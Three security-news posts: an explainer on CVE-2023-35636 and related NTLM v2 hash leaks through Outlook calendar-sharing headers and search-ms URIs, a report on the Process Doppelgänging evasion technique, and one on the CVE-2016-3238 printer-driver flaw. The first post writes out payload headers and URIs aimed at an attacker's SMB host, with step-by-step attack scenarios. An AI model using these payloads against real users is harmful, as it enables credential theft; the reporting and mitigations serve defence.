What is CVE-2023-35636?

CVE-2023-35636 is an exploit targeting the calendar sharing function in Microsoft Outlook. By adding two specific headers to an email, attackers can direct Outlook to share content and contact a designated machine, thereby intercepting an NTLM v2 hash.

Understanding NTLM v2

NTLM v2 is a cryptographic protocol used by Microsoft Windows for authenticating users to remote servers. Despite being more secure than its predecessor, NTLM v2 is still vulnerable to offline brute-force and authentication relay attacks. The protocol involves transporting passwords as hashes, which, without salting, are password equivalent.

Exploitation of NTLM v2 Hashes

Attackers can use NTLM v2 hashes in two primary ways:

1. Offline brute-force attacks: Here, attackers access a copy of the NTLM v2 hash and generate all possible passwords to find a match.
2. Authentication relay attacks: This involves intercepting an NTLM v2 authentication request and forwarding it to a different server.

Leaking NTLM v2 Hashes Using Outlook

The Outlook vulnerability lies in its calendar sharing feature. By crafting an email with specific headers, attackers can redirect the hashed password to their machine.

The Outlook Exploit:

1. “Content-Class” = “Sharing” — Indicates the email contains sharing content.
2. “x-sharing-config-url” = \\(Attacker machine)\a.ics — Directs the victim’s Outlook to the attacker’s machine.

Leaking NTLM v2 Hashes Using URI Handlers and WPA

URI handlers in operating systems allow applications to register for specific URI types. Windows Performance Analyzer (WPA) uses a URI handler “WPA://” by default. Attackers can exploit this to authenticate using NTLM v2 over the open web.

The WPA Exploit

The exploit involves a simple payload that directs the victim’s machine to access the attacker’s machine via SMB, potentially leaking the NTLM v2 hash.

Attack Scenario

Step 1: Crafting the Malicious Email

1. Attacker’s Preparation: The attacker prepares an email with two specific headers:
   • "Content-Class" = "Sharing": This header tells Outlook that the email contains sharing content.
   • "x-sharing-config-url" = \\[Attacker's Machine]\a.ics: This header points the victim’s Outlook to a file (a.ics) hosted on the attacker’s machine.

Step 2: Victim Receives the Email

1. Victim’s Action: The victim receives the email and interacts with it (e.g., clicks on a link or button in the email that says “Open this iCal”).
2. Outlook’s Response: Due to the headers in the email, Outlook attempts to retrieve the a.ics file from the attacker’s machine.

Step 3: Intercepting the NTLM v2 Hash

1. Hash Transmission: When Outlook tries to access the file on the attacker’s machine, it sends an NTLM v2 hash of the user’s password for authentication.
2. Attacker’s Interception: The attacker captures this hash.

Step 4: Exploiting the Hash

1. Offline Brute-Force Attack: The attacker uses the captured hash to perform an offline brute-force attack. This involves trying various password combinations against the hash until a match is found.
2. Gaining Unauthorized Access: Once the correct password is determined, the attacker can use it to access the victim’s account or system.

Example

Imagine a scenario where Alice, an employee at a corporation, receives an email that appears to be a calendar invite from a colleague. The email contains a button saying “Open this iCal”. Unbeknownst to Alice, the email is actually from an attacker and is crafted to exploit CVE-2023-35636.

When Alice clicks the button, her Outlook tries to fetch the a.ics file from what she believes is her colleague’s machine but is actually the attacker’s server. During this process, her computer sends an NTLM v2 hash of her password to the attacker’s server for authentication.

The attacker, now in possession of Alice’s NTLM v2 hash, uses a powerful computer to perform an offline brute-force attack. Eventually, the attacker discovers Alice’s actual password and gains unauthorized access to her corporate account, potentially leading to data theft or further network compromise.

Leaking NTLM v2 Hashes Using Windows File Explorer

How a similar attack to the Outlook vulnerability can be executed using Windows File Explorer. This involves exploiting the “subquery” and “crumb” parameters in the URI handler “search-ms” of Windows File Explorer.

Background: Windows File Explorer and URI Handlers

Windows File Explorer, known as explorer.exe, is a file management application in Windows. It includes a feature called URI handlers, which allows it to process special types of links (search-ms://) that can trigger specific actions within the File Explorer.

Attack Scenario Using Windows File Explorer

Step 1: Crafting the Malicious Link

1. Attacker’s Preparation: The attacker creates a malicious link using the search-ms URI scheme. This link includes special parameters that will direct the victim’s File Explorer to the attacker’s machine. There are two methods to do this:
   • Using the “subquery” parameter: search-ms://query=poc&subquery=\\[Attacker's Machine]\poc.search-ms
   • Using the “crumb” parameter: search-ms://query=poc&crumb=location:\\[Attacker's Machine]

Step 2: Delivering the Malicious Link

1. Distribution: The attacker sends this link to the victim via email, social media, or other means. The link might be disguised as a legitimate search query or file request.

Step 3: Victim Interacts with the Link

1. Victim’s Action: The victim clicks on the link, believing it to be legitimate.
2. File Explorer’s Response: The victim’s File Explorer attempts to execute the search or access the file specified in the link, which points to the attacker’s machine.

Step 4: Intercepting the NTLM v2 Hash

1. Hash Transmission: To access the resource on the attacker’s machine, the victim’s system sends an NTLM v2 hash of the user’s password for authentication.
2. Attacker’s Interception: The attacker captures this hash from their machine.

Step 5: Exploiting the Hash

1. Offline Brute-Force Attack: The attacker uses the captured hash to perform an offline brute-force attack, attempting to find the actual password.
2. Gaining Unauthorized Access: If successful, the attacker can use the password to gain unauthorized access to the victim’s system or network.

Example

Consider a scenario where Bob, a user, receives an email with a link that appears to direct him to a useful file search on his company’s network. The link is actually a malicious search-ms URL crafted by an attacker. When Bob clicks the link, his File Explorer tries to execute the search, which unknowingly points to the attacker’s server.

As File Explorer attempts to access the resource, it sends an NTLM v2 hash of Bob’s password for authentication. The attacker captures this hash and then uses various tools to crack the password offline. Once the password is obtained, the attacker can potentially access Bob’s computer or other resources within the company’s network.

This attack scenario demonstrates the potential vulnerability within Windows File Explorer when handling specially crafted search-ms URLs. It highlights the importance of being cautious with links, even those that seem to be internal file or search requests, and the need for robust security measures to protect against such NTLM hash theft attacks. Varonis Threat Labs also discovered vulnerabilities in Windows File Explorer’s process, explorer.exe, particularly in the “subquery” and “crumb” parameters of the URI handler “search-ms”.

The Windows File Explorer Exploits

1. Using the “subquery” parameter: This method directs explorer.exe to connect to a remote SMB, leaking the NTLM v2 hash.
2. Using the “crumb” parameter: Similar to the “subquery” exploit, this method also leads to the theft of the hashed password.

Microsoft’s Response

Microsoft has acknowledged the Outlook exploit as an important CVE-2023-35636 and released a patch on December 12, 2023. The vulnerabilities for WPA and Windows File Explorer were closed due to “moderate severity.”

Protecting Against NTLM v2 Attacks

To safeguard against these vulnerabilities, it is recommended to:

• Enable SMB signing.
• Block outgoing NTLM v2, especially on Windows 11 (25951) and later.
• Prefer Kerberos authentication and block NTLM v2 at network and application levels.

Unpatched systems remain at risk, and it’s crucial to update and apply security measures to prevent potential exploits.

The post How to steal Windows password via Outlook email exploiting vulnerabilities in Windows Performance Analyzer (WPA) and File Explorer appeared first on Information Security Newspaper | Hacking News.

Dubbed Process Doppelgänging, the new fileless code injection technique takes advantage of a built-in Windows function and an undocumented implementation of Windows process loader.

Ensilo security researchers Tal Liberman and Eugene Kogan, who discovered the Process Doppelgänging attack, presented their findings today at Black Hat 2017 Security conference held in London.

Process Doppelgänging Works on All Windows Versions

Apparently, Process Doppelgänging attack works on all modern versions of Microsoft Windows operating system, starting from Windows Vista to the latest version of Windows 10.

Tal Liberman, the head of the research team at enSilo, told The Hacker New that this malware evasion technique is similar to Process Hollowing—a method first introduced years ago by attackers to defeat the mitigation capabilities of security products.

In Process Hollowing attack, hackers replace the memory of a legitimate process with a malicious code so that the second code runs instead of the original, tricking process monitoring tools and antivirus into believing that the original process is running.

Since all modern antivirus and security products have been upgraded to detect Process Hollowing attacks, use of this technique is not a great idea anymore.

On the other hand, Process Doppelgänging is an entirely different approach to achieve the same, by abusing Windows NTFS Transactions and an outdated implementation of Windows process loader, which was originally designed for Windows XP, but carried throughout all later versions of Windows.

Here’s How the Process Doppelgänging Attack Works:

Before going further on how this new code injection attack works, you need to understand what Windows NTFS Transaction is and how an attacker could leverage it to evade his malicious actions.

NTFS Transaction is a feature of Windows that brings the concept of atomic transactions to the NTFS file system, allowing files and directories to be created, modified, renamed, and deleted atomically.

NTFS Transaction is an isolated space that allows Windows application developers to write file-output routines that are guaranteed to either succeed completely or fail completely.

According to the researcher, Process Doppelgänging is a fileless attack and works in four major steps as mentioned below:

1. Transact—process a legitimate executable into the NTFS transaction and then overwrite it with a malicious file.
2. Load—create a memory section from the modified (malicious) file.
3. Rollback—rollback the transaction (deliberately failing the transaction), resulting in the removal of all the changes in the legitimate executable in a way they never existed.
4. Animate—bring the doppelganger to life. Use the older implementation of Windows process loader to create a process with the previously created memory section (in step 2), which is actually malicious and never saved to disk, “making it invisible to most recording tools such as modern EDRs.”

Process Doppelgänging Evades Detection from Most Antiviruses

Liberman told The Hacker News that during their research they tested their attack on security products from Windows Defender, Kaspersky Labs, ESET NOD32, Symantec, Trend Micro, Avast, McAfee, AVG, Panda, and even advance forensic tools like Volatility.

In order to demonstrate, the researchers used Mimikatz, a post-exploitation tool that helps extract credentials from the affected systems, with Process Doppelgänging to bypass antivirus detection.

When the researchers ran Mimikatz generally on a Windows operating system, Symantec antivirus solution caught the tool immediately, as shown below:

However, Mimikatz ran stealthy, without antivirus displaying any warning when executed using Process Doppelgänging, as shown in the image at top of this article.

Liberman also told us that Process Doppelgänging works on even the latest version of Windows 10, except Windows 10 Redstone and Fall Creators Update, released earlier this year.

But due to a different bug in Windows 10 Redstone and Fall Creators Update, using Process Doppelgänging causes BSOD (blue screen of death), which crashes users’ computers.

Ironically, the crash bug was patched by Microsoft in later updates, allowing Process Doppelgänging to run on the latest versions of Windows 10.

I don’t expect Microsoft to rush for an emergency patch that could make some software relying on older implementations unstable, but Antivirus companies can upgrade their products to detect malicious programs using Process Doppelgänging or similar attacks.

Source:https://www.digitechengine.com/new-malware-evasion-technique-works-on-all-windows-versions/

The post New Malware Evasion Technique Works On All Windows Versions appeared first on Information Security Newspaper | Hacking News.

Security firm Vectra discovered the vulnerability (CVE-2016-3238), which Microsoft fixed in MS16-087. At its core, the issue resides in how Windows handles printer driver installations and how end users connect to printers.

Exploit executes payload under SYSTEM user

By default, in corporate networks, network admins allow printers to deliver the necessary drivers to workstations connected to the network. These drivers are silently installed without any user interaction and run under the SYSTEM user, with all the available privileges.

Vectra researchers discovered that an attacker can replace these drivers on the printer with malicious files that allow him to execute any code he’d like on the infected machine.

The attack can be launched from the local network or via the Internet, thanks to the Internet Printing Protocol or the webPointNPrint protocol. This type of attack can be delivered via innocuous methods such as ads (malvertising) or JavaScript code hidden in compromised websites.

Attacks can take place in several ways

There are numerous ways in which these attacks can take place, making CVE-2016-3238 a very dangerous issue for corporate environments.

A threat actor could hack a company’s Internet-connected printers. This can be done using common user-password combinations, or by using vulnerabilities to hack inside the printer by force, and later replace these printing drivers with malicious content. Hacking printers is exceptionally easy these days, as the Weev incident has recently shown us.

If the printer is behind a firewall, an attacker can hack another device or computer on that network, and use it to pivot to the printer and host his malicious files.

If the printer can’t be hacked, or doesn’t have any type of vulnerabilities, the attacker can just spoof the printer via special software. Computers on the attacked network would connect to the fake printer and download the attacker’s malicious code.

Watering hole attacks via printers

Because printers are just like servers, with multiple computers connecting to them to download drivers and print documents, a hacker is technically executing watering hole attacks using printers. Watering hole attacks, or drive-by downloads, are the methods through which exploit kits function.

By this point in time, CVE-2016-3238 is by far the vulnerability of the year, being easy to execute, providing different methods of launching attacks, and affecting a humongous number of users.

Vectra’s researchers have prepared a technical breakdown of the vulnerability on their blog, but they have also made available the following video presentation. Microsoft says it fixed the vulnerability “by issuing a warning to users who attempt to install untrusted printer drivers.”

Source:https://news.softpedia.com/

The post Vulnerability Exploitable via Printer Protocols Affects All Windows Versions appeared first on Information Security Newspaper | Hacking News.